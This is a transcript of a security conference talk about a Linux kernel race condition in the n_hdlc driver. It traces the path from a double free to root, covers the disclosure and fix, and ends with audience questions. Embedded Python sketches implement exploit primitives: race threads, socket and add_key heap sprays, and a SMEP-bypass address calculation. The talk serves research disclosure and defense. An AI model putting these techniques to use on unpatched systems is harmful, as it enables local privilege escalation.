Our next talk will be presented by Alexander Popov. He is a Linux kernel developer specializing in security, and he will tell us about the race for root and the analysis of a Linux kernel race condition exploit. Give him a welcoming, warm applause. Hello. Thanks for coming. I'm Alexander Popov, and the name of my talk is Race for Root. I will tell you about the exploitation of a race condition in the Linux kernel. First of all, I would like to ask who here has never heard about Linux. Nice. I'm at the right place. So yes, I'm a Linux kernel developer, and I'm a security researcher at Positive Technologies. The plan of the talk: first of all, I will tell you about the vulnerability which I found, show the exploit demo video, and then describe the exploit step by step: how to hit the race condition and get a double free out of it, how to turn the double free into a use-after-free and exploit it, and finally how to bypass SMEP, Supervisor Mode Execution Prevention, without return-oriented programming. I will show another way to do it. And finally, about the defense. This vulnerability is a local privilege escalation flaw in the Linux kernel. It is a race condition in the n_hdlc kernel driver. This driver is provided by all major distros; it ships as a loadable kernel module, and that's why all major distros were affected. What is this driver used for? It is a driver providing a line discipline for the TTY subsystem which supports the High-Level Data Link Control (HDLC) protocol. It is a data link protocol, and its frames can be sent over serial lines. Nowadays it's mainly used for device-to-device communication. This particular bug was introduced quite a long time ago, in 2009. And more than seven years later, the syzkaller fuzzer on my machine gave me a suspicious crash. Syzkaller is a really good project; you should check it out. It has made Linux kernel code much better.
Several days after that, I had a stable race condition repro, and then came a very intensive working time. At the end of the month, I had an exploit proof of concept and the patch fixing this particular bug. Then, at the end of February, I contacted security@kernel.org, and several days after that, all the major distros which were affected were informed about this vulnerability, and my patch was provided to them. The 7th of March was the end of the embargo, and I announced this vulnerability on the public mailing list. On that particular day, the distros provided the kernel update. Several weeks after that, I published a write-up about the vulnerability. And currently there is a patch from me for the Linux kernel mainline which helps block similar attacks; it is now being discussed on the Linux kernel mailing list. What was wrong in the code? First of all, the original driver used a self-made singly linked list to store the buffers to be sent over the line. And it used a special variable, tbuf, to store the pointer to a buffer which needs to be resent in case of a transmit error. That was quite fine. But later, in another commit, the buffer flushing feature was added, and it introduced racy access to the tbuf variable. Now the sending function and the flushing function can put this particular buffer onto the free list twice — it happened under wrong locking. And when you close the pseudo-terminal later, the release function can free this buffer twice, which is a double-free error. It is as dangerous as it sounds. And now I'll show the demo of how to get root out of it. It was a fresh Linux Mint installation. Here I'm showing that the machine which I used to run the exploit didn't have the SMAP feature, which stands for Supervisor Mode Access Prevention — I'll give the details later. But this machine has the SMEP feature; you can see it. Now I show that I'm going to run this exploit as an unprivileged user.
Now I'm showing the code, censored a little bit against the script kiddies, then compiling and running it. The exploit is really stable. It doesn't crash the kernel, and it gets root really fast. So that's it. Now I will describe the exploit step by step, what I've done to achieve that. The main steps are: first of all, prepare the environment for the race; then hit the race condition and get a double free; then heap spraying number one, to turn this double free into a use-after-free, which is exploitable; and heap spraying number two, to exploit this use-after-free. Finally, heap stabilization for returning the system to its initial state: if we didn't hit the race condition, we should start the exploit once again — I mean, go to the next iteration of the exploit. And finally, I will show a new way to bypass the SMEP defense feature without return-oriented programming. Quite simple and nice. Now, first, preparing for the race. Let me show how the pseudo-terminal works and where the vulnerable driver sits in this diagram. A pseudo-terminal is created when we open the pseudo-terminal master side and get a file descriptor for it. The terminal emulator works on the master side, and the program which runs in this pseudo-terminal is running on the slave side. The main logic happens here, in the line discipline. A line discipline is a piece of kernel code which provides logic like clearing the last character if you hit backspace, or echoing the input which you just typed into the pseudo-terminal back to xterm, for example. And the vulnerable n_hdlc driver provides the HDLC line discipline. We are going to exploit this particular part. So, to prepare for the race, first we stick to one single CPU, to make all the vulnerable driver's memory allocations go into a single allocator cache, since allocator caches are per-CPU. We want to have all the work done in one cache.
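The preparation just described — pinning to one CPU, opening the pty master, and requesting the N_HDLC line discipline — can be sketched like this. This is a Python stand-in for the exploit's C code; the ioctl and line discipline numbers come from the Linux uapi headers, and the N_HDLC request may legitimately fail on a machine where the module is unavailable, so the sketch does not assume it succeeds:

```python
import fcntl
import os
import struct

TIOCSETD = 0x5423   # "set line discipline" ioctl from <asm-generic/ioctls.h>
N_HDLC = 13         # line discipline number served by the vulnerable driver

def prepare_for_race():
    # Stick to a single CPU so all of the driver's memory allocations
    # land in one per-CPU slab cache.
    os.sched_setaffinity(0, {0})
    # Open the pseudo-terminal master; the pty master/slave pair is created.
    ptmx = os.open("/dev/ptmx", os.O_RDWR | os.O_NOCTTY)
    # Ask the TTY layer for the N_HDLC line discipline; on success the
    # vulnerable module is loaded automatically.  This can fail if the
    # module is absent or blacklisted, so we only report the outcome.
    try:
        fcntl.ioctl(ptmx, TIOCSETD, struct.pack("i", N_HDLC))
        ldisc_set = True
    except OSError:
        ldisc_set = False
    return ptmx, ldisc_set
```

In the real exploit these calls are made once per iteration, before arming the race by suspending the pseudo-terminal output.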
Then, as I said, we open the pseudo-terminal master side, and the pseudo-terminal master and slave pair is created. Then we set the line discipline for this pseudo-terminal, and the vulnerable module is automatically loaded. We can now exploit it. Then, as I said, the race condition happens between sending and flushing in the case of a previous sending error. To arrange this, I suspend the pseudo-terminal output, so sending the buffer which I put into it fails, and the pointer to it is saved in the tbuf variable. Now we are ready for the race, and we allow the threads of our exploit to work on all CPUs and compete with each other. Now, the racing itself. The first thread will flush the data — it will call this ioctl. And the second thread will start the suspended output, and it will try to send the buffer whose pointer is stored in the racy tbuf variable. It turned out that introducing lags in these threads makes the whole exploit work faster and hit the race condition earlier. So what do the threads do? First, they synchronize at a pthread barrier — you see it on the left-hand side. Then one of the threads, for example the flushing thread, spins in a busy loop, while the other thread already starts communicating with the vulnerable driver. And at this special moment, they both use the tbuf variable, and we have the race condition. I should have said that a race condition is a situation in the system where the result of a computation depends on the order of operations — a non-deterministic situation in the system. Here, the result of working with the tbuf variable depends on how the threads collide. For choosing the lag length, I used this code. The lags are introduced in turn: for the second thread, for the first thread, for the second thread, and so on. The lag grows, and it is capped at 50 microseconds. That makes the exploit go faster: the threads collide earlier, and we have a faster exploit. Now, triggering the actual double free.
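The thread choreography above — synchronize on a barrier, busy-spin for a small per-thread lag, then both touch the shared tbuf pointer — can be modeled with Python threads. The names Racer and lag_schedule are illustrative, not from the exploit; the non-atomic check-then-act on tbuf is the essence of the race:

```python
import threading
import time

class Racer:
    """Two threads synchronize on a barrier, then race for the shared
    'tbuf' slot after per-thread lags, mimicking the flush/resume race."""

    def __init__(self):
        self.barrier = threading.Barrier(2)
        self.tbuf = "buffer"   # stand-in for the racy buffer pointer
        self.freed = 0         # how many times the buffer got "freed"

    def _spin(self, lag_us):
        end = time.monotonic() + lag_us / 1e6
        while time.monotonic() < end:   # busy loop, like the exploit's lag
            pass

    def _worker(self, lag_us):
        self.barrier.wait()             # both threads start together
        self._spin(lag_us)
        if self.tbuf is not None:       # non-atomic check-then-act:
            self.freed += 1             # both threads may "free" the buffer
            self.tbuf = None

    def run(self, lag_a_us, lag_b_us):
        a = threading.Thread(target=self._worker, args=(lag_a_us,))
        b = threading.Thread(target=self._worker, args=(lag_b_us,))
        a.start(); b.start(); a.join(); b.join()
        return self.freed               # 2 means the race was hit

def lag_schedule(cap_us=50):
    """Grow the lags in turn, capped at 50 microseconds, as in the talk."""
    a = b = 0
    while True:
        yield a, b
        if a <= b:
            a = min(a + 1, cap_us)
        else:
            b = min(b + 1, cap_us)
```

Each exploit iteration takes the next lag pair from the schedule, so the collision window is swept until the threads actually overlap on tbuf.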
We stick to the first CPU core again and close the pseudo-terminal. The release function then runs and frees the buffers in the free list. If we hit the race condition, we have a doubled buffer in the list and get a double free. The kernel address sanitizer can detect it, and the kernel address sanitizer report was, in fact, the report from syzkaller which I got, after which I started to investigate this issue. Now we need to exploit the double free. We try to do it, and if we got root, we run the shell; otherwise, we go and race again. Now I want to show you how double-free exploitation works in general. The idea is quite beautiful, I would say. First, we allocate some object A. Later, it is freed — that's fine. But we have an error: a second freeing of this object A, and we will use it. Now we allocate another object B, which has the same size. The kernel allocator tends to give you the address that has just been freed, because it can be accessed very fast — it was just used. So our object B is allocated at the same place. But then the second, buggy freeing of the first object A happens, and it actually frees object B. Now, after object B is freed, we can do heap spraying number two: we allocate another object X of the same size. It is put at the place of object B, but it carries our controllable payload. And then the code which still uses object B will work with the payload of object X and can do malicious activity. That is the main idea of exploiting a double free. So the first heap spraying turns the double free into a use-after-free, and using object B is the exploitation of this use-after-free error. Now, about this particular exploit. The buffer which we are exploiting is allocated in that slab cache. The Linux kernel allocator is called the slab allocator.
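The double-free-to-use-after-free scheme just described can be demonstrated with a toy LIFO free list that, like the naive allocator behavior from the talk, happily accepts freeing the same address twice. ToyCache is purely illustrative:

```python
class ToyCache:
    """Toy LIFO slab cache with no double-free check, so a second free
    of object A silently frees whatever now lives at A's address."""

    def __init__(self):
        self.free_list = []
        self.next_addr = 0x1000

    def alloc(self):
        if self.free_list:
            return self.free_list.pop()   # most recently freed comes back first
        addr = self.next_addr
        self.next_addr += 0x2000          # 8 KB objects
        return addr

    def free(self, addr):
        self.free_list.append(addr)       # no check that addr is still in use

cache = ToyCache()
a = cache.alloc()   # object A
cache.free(a)       # legitimate free of A
b = cache.alloc()   # object B lands at A's old address (b == a)
cache.free(a)       # the buggy second free of A actually frees B
x = cache.alloc()   # heap spray #2: attacker object X reuses B's memory
# B and X now alias the same address: use-after-free on B with X's payload.
```

In the real exploit, B is a socket buffer with a function pointer and X is the attacker-controlled payload that overwrites it.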
The allocator prepares several objects of the same size, say, 8 kilobytes, and is ready to hand these objects to the code which calls kmalloc. So we will exploit the double free in this particular cache. We need two types of objects: the first object, for the first heap spraying, which has a function pointer; and the second one, with a controllable payload, to overwrite this function pointer and run our shellcode. It turns out that the socket buffer in the Linux kernel works very well as the first object. It has a function pointer which we can overwrite, and it can be allocated in the needed cache. I would say that it is the object for storing network frames in the Linux kernel: the actual network data is stored here, and struct sk_buff stores the meta-information. But it turned out that the first heap spraying — getting the double-freed object overwritten — doesn't work so simply, because the release function frees 13 buffers straight away. There are 13 buffers in the list in the n_hdlc driver, and it frees them straight away, and all of them are put onto the free list of the allocator. It turns out that the double-freed item ends up at the beginning of the free list, and it's not easy to get it back again. I was trying to squeeze the allocation of some network packet in between, to catch the double-freed item at the beginning of this free list, but I didn't succeed, because this n_hdlc release function runs on a single CPU and is not interrupted. So, still puzzled. But if we look carefully, we see that this function which frees the buffers doesn't crash the kernel. And that means that the kernel allocator accepts consecutive freeing of the same address, of the same buffer. It is strange — it is naive, but that's how it is. So if I spray after the release function, I can get the buffers from the free list one by one, and finally arrive at such a nice situation.
I have two socket buffers pointing to the same data, and that is very nice, because if we receive one of these buffers, we get a use-after-free on the second one. Really nice. So, for turning the double free into a use-after-free, I spray a lot of 8-kilobyte UDP packets after the release and keep them allocated in the kernel memory. It's not easy, because the socket queue for network packets is limited in size; that's why I use a lot of socket queues, so as not to overflow them and to keep all my packets in the kernel memory. Then I receive one of the twin socket buffers and have a use-after-free error on the other one. That's nice. The heap spraying implementation looks like this: I have 200 server sockets for the heap spray and send packets to them. Empirically, I know which packets are likely to point to the same data; those I send to a dedicated server socket, to get the use-after-free error on them later. Then, after receiving some packets from the dedicated server socket, I need to return the state of the allocator to the initial position, so as not to crash the kernel. That's why I send some packets to the other 200 server sockets: to exhaust the partially freed slabs in the kernel allocator and start the next round of the racing — the next round of the exploit — from scratch. So the first heap spraying is done. Now, after receiving one of the twin packets, we need to overwrite the contents of the second one to get a local privilege escalation. So now we are focused on the second heap spraying and executing the shellcode. Heap spraying number two should overwrite destructor_arg in the socket buffer. Another socket buffer doesn't work for that, because the structure with the data which we want to overwrite sits at the same offset from the beginning every time, so we don't control it. That's why I needed another kernel object to overwrite the destructor, and I was searching for it for a long time. I tried a lot of kernel objects.
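The first heap spray — keeping many large packets queued in kernel memory, spread over several sockets so no single receive queue overflows — looks roughly like this. Here AF_UNIX datagram pairs stand in for the exploit's 200 UDP server sockets, and the counts are scaled down; the names and numbers are illustrative:

```python
import socket

SPRAY_SIZE = 8000  # close to the 8 KB n_hdlc buffer size

def spray(n_sockets=8, packets_per_socket=4):
    """Queue n_sockets * packets_per_socket large datagrams in the kernel.

    Each queued datagram keeps a socket buffer (and its data buffer)
    allocated in kernel memory until someone receives it.
    """
    payload = b"\x41" * SPRAY_SIZE
    pairs, queued = [], 0
    for _ in range(n_sockets):
        tx, rx = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
        # Enlarge the receive queue so our datagrams are not dropped.
        rx.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1 << 20)
        for _ in range(packets_per_socket):
            tx.send(payload)   # stays allocated in the kernel until recv()
            queued += 1
        pairs.append((tx, rx))
    return pairs, queued
```

Receiving one of the "twin" packets then frees its buffer, producing the use-after-free on the other; receiving the rest later restores the allocator state.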
And finally I found that the add_key syscall can store a controllable payload in the kernel memory and can make allocations in the cache which I'm interested in. Nice. So let's see how the destructor is used. If the packet has this particular flag and the destructor is not NULL, our callback is called. So the second heap spraying should overwrite the data: set this particular flag and point the destructor at our payload, which is allocated in user space. The ubuf_info structure with the callback is allocated in user space, and the shellcode is also in user space memory. And here, when the destructor pointer is dereferenced, SMAP could block our exploit. Again, SMAP is Supervisor Mode Access Prevention: it gives a fault if you dereference a pointer to user space memory while in kernel space. There are some techniques for bypassing it. In my particular exploit, I bypass the second defense feature, called SMEP, Supervisor Mode Execution Prevention: the processor gives a fault if a CPU instruction is fetched from a user space address while in kernel mode. I will show how to bypass that one. But it turns out that heap spraying number two, to overwrite the network packet, doesn't go so easily, because we have so-called key data quotas. They are controlled by root, and the maximum size of payload which we can have in the kernel space is only 20,000 bytes. That means that only two add_key calls will succeed, and that's not enough for spraying. So, puzzled again. But then I saw a bright idea in the slides of Di Shen from Keen Security Lab — thanks to him for that work. It turns out that successful heap spraying doesn't depend on the success of the syscall which you call. So I allow my add_key call to fail, but the payload actually ends up in the kernel memory, and it can overwrite the socket buffer. That's fine — just allow it to fail.
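The add_key trick can be sketched with a raw syscall. The syscall number below is for x86_64; in a sandbox or on another architecture the call may simply fail with ENOSYS or EPERM, which — as the slide's point goes — does not matter for the spray, since the payload is copied into a kernel buffer before the quota check can reject the call:

```python
import ctypes

libc = ctypes.CDLL(None, use_errno=True)
NR_ADD_KEY = 248                 # x86_64 syscall number for add_key(2)
KEY_SPEC_PROCESS_KEYRING = -2    # from <linux/keyctl.h>

def add_key_spray(payload: bytes):
    """One add_key() call used purely as a heap spray primitive.

    Even when the call fails (e.g. EDQUOT once the per-user key quota
    is exhausted), the payload has already been copied into a freshly
    kmalloc'ed kernel buffer of our chosen size -- which is all the
    spray needs.
    """
    ret = libc.syscall(NR_ADD_KEY,
                       b"user",          # key type
                       b"spray",         # description
                       payload, len(payload),
                       KEY_SPEC_PROCESS_KEYRING)
    err = ctypes.get_errno() if ret == -1 else 0
    return ret, err
```

The exploit therefore fires these calls without checking the return value: the side effect in kernel memory is the whole point.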
So the final spraying implementation looks like this: 20 packets to the server sockets for spraying. Then, empirically, I found out that packets number 12, 13, 14, and 15 are likely to be doubled — to point to the same data. I send those to the dedicated server socket, to receive them later. And I receive these four packets one by one, making some add_key calls in between to overwrite the second twin socket buffer. Finally, after the receiving — and receiving is freeing — I restore the initial state of the allocator by sending 15 additional packets to the other server sockets. That is the main thing which makes the exploit so stable. Without it, we get a kernel crash when the slab is fully freed and the allocator detects that it had a double free in it. So, to avoid this kernel crash and make our exploit work, we should restore the state — this technique is called slab exhaustion. And here are examples of working with the add_key call: this one is for storing our payload in the kernel space, and this is the invalidation of the first two add_key calls, which succeed. So, finally, about bypassing SMEP. I'm showing it again: when the kernel tries to execute an instruction in user space, we get a fault. First of all, I'll say that it is not a software but a hardware feature — the x86 CPU provides it, and it is controlled by the 20th bit of the CR4 register. So if we can write to this register and set this particular bit to zero, we have that feature disabled. There are several ways to bypass it already known in public; you can look at them later. They are quite complex, because the first one uses return-oriented programming, and both of them need an arbitrary memory write to bypass SMEP and SMAP. And I will show another, easy way. It turns out that the kernel already has the needed function: there is native_write_cr4, which just writes its argument to the CR4 register. And let's look more carefully at how the destructor is used.
The callback is called with the address of the ubuf_info structure as its first argument, which is an unsigned long as well. So if I use native_write_cr4 as the callback, and if I place the ubuf_info structure in memory obtained from the mmap system call, and if our ubuf_info resides at this particular address, then SMEP is disabled — because this particular address equals the value of the CR4 register with the SMEP bit cleared on my machine. So: just mmap, put the payload there, and have SMEP disabled. Everything needed is already in the kernel. After SMEP is disabled, I can race again and execute the shellcode on the second successful exploit iteration. I would like to add that the correct value of the CR4 register is machine-specific, but it can be determined from user space with the CPUID instruction on x86. Finally, about the fix. As I said, I approached the mainline maintainers with a patch for this race condition. It uses the standard kernel linked lists instead of the self-made ones, and I got rid of the racy tbuf variable. If sending fails, the buffer which was not sent is just put back at the head of the queue, for sending later. And as I showed you, the kernel allocator behaves quite strangely, allowing consecutive freeing of the same address. The GNU C library, for example, has the so-called fasttop check: when we free another object and put it onto the free list, we check that its address is not equal to the previously freed object. So I did the same for the mainline, and it's quite cheap — a check which can block double-free exploitation. Currently it is being discussed on the Linux kernel mailing list, and I hope that it will get into the mainline behind a particular config option — they didn't allow me to enable it in the kernel by default. That's all, and I would really appreciate your questions. I have nice souvenirs for the best questions. Thank you very much, Alexander. And indeed, we have a lot of time for questions.
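The arithmetic behind the SMEP bypass can be shown concretely. SMEP lives in bit 20 of CR4; clearing it yields the value that native_write_cr4() must receive as its first argument, and since that argument is the address of our ubuf_info, the structure must reside at exactly that address, inside a page mapped at a fixed location with mmap. The CR4 value below is a made-up example, not from any specific machine:

```python
X86_CR4_SMEP = 1 << 20   # SMEP enable bit in the CR4 control register
PAGE_MASK = ~0xFFF       # 4 KB pages

def smep_bypass_layout(cr4: int):
    """Where to mmap and where to place ubuf_info for the bypass.

    target: the value native_write_cr4() must be called with, i.e. the
            current CR4 with the SMEP bit cleared -- and therefore also
            the user space address our ubuf_info must reside at.
    page:   page-aligned address to request from mmap(MAP_FIXED).
    offset: position of ubuf_info inside that mapped page.
    """
    target = cr4 & ~X86_CR4_SMEP
    page = target & PAGE_MASK
    offset = target - page
    return target, page, offset

# Hypothetical CR4 value with SMEP enabled (bit 20 set):
cr4 = 0x1407F0
```

When the kernel dereferences the overwritten destructor, it calls native_write_cr4(target), and target is by construction CR4 without the SMEP bit — so the write disables SMEP.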
So please go to the center of the stage, where you will find microphones, and pose your questions, please. Hi. You said that the Linux kernel maintainers did not want to add the mitigation by default. Why? Thanks for the question. First of all, they already have all the corresponding checks in the slab debug feature. If you run your kernel with slab debugging in the kernel parameters, the allocator checks whether there is a double free or other errors, for example allocator metadata corruption. So they didn't want to have the same feature in two places. But the problem is that the default kernel which a distro provides doesn't have this option enabled, and so the allocator just accepts freeing the same address twice. Did they provide any solution for the fact that nobody ships with this enabled? They allowed me to put this check under a specific kernel config option, and I hope that several distributions which want to provide security for their users will use this option. This particular option has a nice feature: it randomizes the order of the items in the free list. So if an attacker has a heap overflow exploit and wants to overwrite the next pointer in the free list, he will have to guess the cookie, which is unique for every CPU and every allocator cache. And I hope that my check will also be included under this config option. All right, thanks. Thank you. Next question, please. Hi. Do we understand correctly that this only works if you have both user space and kernel space in the same mapping? So if you have a kernel that does not map user space into the same address space as the kernel, would this still work? Some architectures don't map the user space into the kernel address space. Linux has it by design right now. So on Intel, you map kernel and user space into the same address space, but you mark the kernel pages as kernel so that user space cannot access them. But some other architectures don't do that. Yes. On x86, segmentation is not used.
It is historically like that, so it is all mapped. Yeah, but not all architectures do that. Yes. For example, the grsecurity patchset has the so-called UDEREF feature, which uses segmentation and helps against these attacks. It's not about segmentation — I'm talking about architectures, not Intel, where you don't have user space mapped into the same address space as the kernel. Do you know whether it's like that for ARM in Linux? Maybe — I don't know about ARM. So would your exploit still work if you don't have user space in the same address space as the kernel? Maybe some return-oriented programming would help there. But the technique which Vitaly Nikolenko described — it is called stack pivoting, when you move the kernel stack onto user space memory, so the kernel stack is controlled and you can do whatever you want with return-oriented programming — also relies on user space memory being mapped in the kernel address space. When you run a system call, the kernel works in kernel space on behalf of the process which made the call. My exploit is a user space program: it makes some system calls, and the kernel works on behalf of the exploit in kernel space. So the kernel, when it executes a system call, knows which process asked for it, and that needs to work. If we don't map user space memory into the kernel address space, we should still provide this: the kernel should know which process is being executed right now. Thank you. More questions from the audience? Yes, please come to the mic. Hi. Hi. Could you tell us some more about the process of informing the Linux kernel developers and the distros, et cetera? Because at the beginning of your talk, you gave the timeline. Yes. And it took a couple of days. So can you tell us how it worked? Did it work smoothly? Were there any issues, et cetera? Yes.
Thank you for the question. First, I contacted security@kernel.org, and it took us some time to understand that the vulnerability is serious, because it affects all major distros. At first, the maintainers didn't realize that this option is enabled on all distros. Three days later, one of the kernel security engineers contacted the distros and described the vulnerability, and my patch, which I had sent to security@kernel.org, was sent to the distros. But some additional work was needed, because all the stable kernel releases were also affected — the vulnerability was introduced in 2009, as you saw, quite a long time ago. So not only were all major distros affected; all stable kernel releases were affected as well. And some of them didn't have today's standard kernel linked lists. So I worked with the distro developers to provide a patch which would fix the issue on the old stable kernel releases. And the embargo which I mentioned ends on a specific date when I'm allowed to share the information about the vulnerability. On that particular date, the distros give the kernel update to their users. It happens almost simultaneously, to decrease the chances of black hats attacking this vulnerability in case they can reproduce the bug and write an exploit very fast. That's why security researchers usually don't give away the exploit — the exploit proof of concept, I mean — straight away, but wait for some time to allow all distro users to update their systems. Of course, unfortunately, not all people do that; not all people update their systems, and they stay vulnerable. And when I wrote to security@kernel.org, the security engineers, the maintainers, obtained the CVE ID themselves. Now that has changed: there is a special organization called MITRE, which assigns the CVE numbers to vulnerabilities.
So now you should contact MITRE yourself, describe the vulnerability, show the impact, and you will get the CVE identifier for the vulnerability. It is your responsibility now to get this number. And this number is important, because it helps to track whether your system has all the current security updates — it helps to understand whether you have all the recent patches for the vulnerabilities. That's it. Thank you for the question. Thank you very much. Someone else — more questions from the public? No? Then I would like to continue on that question. Who sets the time for the embargo? The kernel maintainers, in collaboration with the distros, decide how much time they need to fix the issue and to prepare the new kernels for the users. What if they guess the embargo time wrong? Can they also extend it — say, we need one more month or one more week? It doesn't look good to stay vulnerable if the information about the vulnerability is already available. But as you saw, in less than a week all distros provided the patch. Next question, please. The man at the back first, sorry. Hello. What measures does the kernel take in order to prevent falling on the same stone twice? Could you repeat, please? Yes — what measures is the kernel taking in order to prevent stepping on the same stone twice? If I understood you right, you are asking what I did to prevent the double freeing, right? No, I'm asking how the kernel — get closer to the mic, please — I'm asking how the kernel prevents this from happening again. Ah, you mean this particular bug, the race condition? Or this particular class of bugs? There is no general defense against race conditions; the proper defense is proper code with proper locking. And the result of a race condition can differ. In this particular case, it was a double free, and that can be detected.
For example, the slab debug option makes the kernel drop the second freeing of the same item: on every freeing, it goes through the free list in the allocator and drops the current freeing if the item was already freed. I can't say that I like it very much, because if a double free happened, that means a bug was already hit somewhere in the kernel — it's already bad. So maybe it is not good to trust the process which caused this double-free error. But anyway, slab debug provides that. Maybe there are other defenses against the results of race conditions... ah yes, there is a nice project called the thread sanitizer. You may have heard about it — it is a brother of the kernel address sanitizer, and so on. It provides compile-time instrumentation to detect race conditions — racy accesses to memory. It stores meta-information about the memory in a separate place and checks it every time the memory is accessed. It doesn't work very fast, but it can be used for debugging the kernel. It is not currently in the mainline, because it has a lot of false positives, but you can apply the patch, try to run your kernel with this debug option, look at all the reports, and fix the code. So it is a debugging feature, the thread sanitizer. Thank you for your question. I have a question: is it exploitable on AMD64? And the second question: when will a script kiddie's version be available? OK, yes, it can be exploited on AMD, sure. And I already wrote a detailed write-up about this vulnerability and the exploit; it has some parts of the code, and this talk provided some details. I didn't really want to give out the full exploit, because there are anyway a lot of out-of-date kernels on the systems of different people. Sometimes people say: we have defended the perimeter of our network, it's fine to have out-of-date systems inside.
So that's why I don't give out the full exploit. Thank you. Next question, please. Since this bug is in such a hot path, do you think it is possible to live-patch it? Live-patch it? Yes. Thanks for your question. While working on the fix with the distros, I was contacted by a developer from Oracle. They have a live-patching subsystem, and we were working on a really small fix which can be applied with it. These live patches work as kernel modules: you just load the patch module into your kernel, and the code paths are fixed. But the patch should not be really big; that's why we worked to make it as small as we could, to live-update the systems. You're talking about Ksplice? I'm talking about kpatch, the vanilla kernel live-patching mechanism. Yes, both of them can do it. Thank you for your question. Question in the front, please. I have another question for you. You said somewhere near the start of the presentation that the cause of this was a homegrown linked list implementation. I can imagine that a lot of these homegrown implementations are going to be wrong in some way. How common are they in the Linux kernel — homegrown implementations of something that should really be using a standardized kernel implementation? I would say that this particular driver is quite old, and it was not used very intensively, so it is not kernel code which has a lot of developers looking into it. And there is a lot of such code in the Linux kernel — it has more than 20 million lines of code, as I remember, so it's quite big. But this particular bug — I was lucky to find it, because the driver was enabled on all distros. I guess it could be possible to write a simple program which finds the oldest code which your distro provides you, and, for example, fuzz it. All right, thanks. Thank you. Question at the back, please. Yes, I'd like to hear more about how this bug was detected in the first place. One of your early slides said that somebody contacted you.
Do you have more information on how this was originally detected, and why it came to you? Originally, it was detected on my system. I ran syzkaller, the fuzzer, on my machines and got a suspicious crash. Then I investigated why this crash happened. A cool feature of syzkaller is that it can provide a C program which reproduces the crash — it just makes a lot of syscalls on a virtual machine, and then you can run the result again. So you can reproduce the bug again and see this particular crash. After I had a stable repro, I started to investigate how to exploit it — not to get a crash, but to get root. So it all happened on my machine. And you can install and use syzkaller too; it's quite easy, and they have a nice wiki on GitHub. I really like the people who develop it. Thank you. More questions from the audience? You can still enjoy about seven minutes of open question time. Nobody else? Well, in that case, I will close the session. Thank you very much, Alexander. Thank you very much. A big round of applause for him.